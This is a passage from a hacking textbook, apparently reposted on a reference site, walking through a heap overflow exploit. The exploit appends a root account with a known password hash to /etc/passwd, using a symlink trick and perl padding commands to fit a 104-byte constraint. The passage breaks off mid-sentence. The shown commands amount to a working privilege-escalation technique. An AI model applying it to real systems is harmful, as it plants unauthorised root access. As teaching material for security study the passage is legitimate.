Graphics Programs Reference
In-Depth Information
for that user. Using the salt value from the stored encrypted password, the
system uses the same one-way hashing algorithm to encrypt whatever text
the user typed as the password. Finally, the system compares the two hashes;
if they are the same, the user must have entered the correct password. This
allows the password to be used for authentication without requiring that the
password be stored anywhere on the system.
Using one of these hashes in the password field will make the password
for the account be password , regardless of the salt value used. The line to
append to /etc/passwd should look something like this:
myroot:XXq2wKiyI43A2:0:0:me:/root:/bin/bash
However, the nature of this particular heap overflow exploit won't allow
that exact line to be written to /etc/passwd, because the string must end with
/etc/passwd. However, if that filename is merely appended to the end of
the entry, the passwd file entry would be incorrect. This can be compensated
for with the clever use of a symbolic file link, so the entry can both end with
/etc/passwd and still be a valid line in the password file. Here's how it works:
reader@hacking:~/booksrc $ mkdir /tmp/etc
reader@hacking:~/booksrc $ ln -s /bin/bash /tmp/etc/passwd
reader@hacking:~/booksrc $ ls -l /tmp/etc/passwd
lrwxrwxrwx 1 reader reader 9 2007-09-09 16:25 /tmp/etc/passwd -> /bin/bash
r eader@hacking:~/booksrc $
Now /tmp/etc/passwd points to the login shell /bin/bash. This means
that a valid login shell for the password file is also /tmp/etc/passwd, making
the following a valid password file line:
myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd
The values of this line just need to be slightly modified so that the portion
before /etc/passwd is exactly 104 bytes long:
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:me:/root:/tmp"' | wc -c
38
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x50 . ":/root:/tmp"'
| wc -c
86
reader@hacking:~/booksrc $ gdb -q
(gdb) p 104 - 86 + 50
$1 = 68
(gdb) quit
reader@hacking:~/booksrc $ perl -e 'print "myroot:XXq2wKiyI43A2:0:0:" . "A"x68 . ":/root:/tmp"'
| wc -c
104
r eader@hacking:~/booksrc $
If /etc/passwd is added to the end of that final string (shown in bold), the
string above will be appended to the end of the /etc/passwd file. And since
this line defines an account with root privileges with a password we set, it won't
Search WWH ::




Custom Search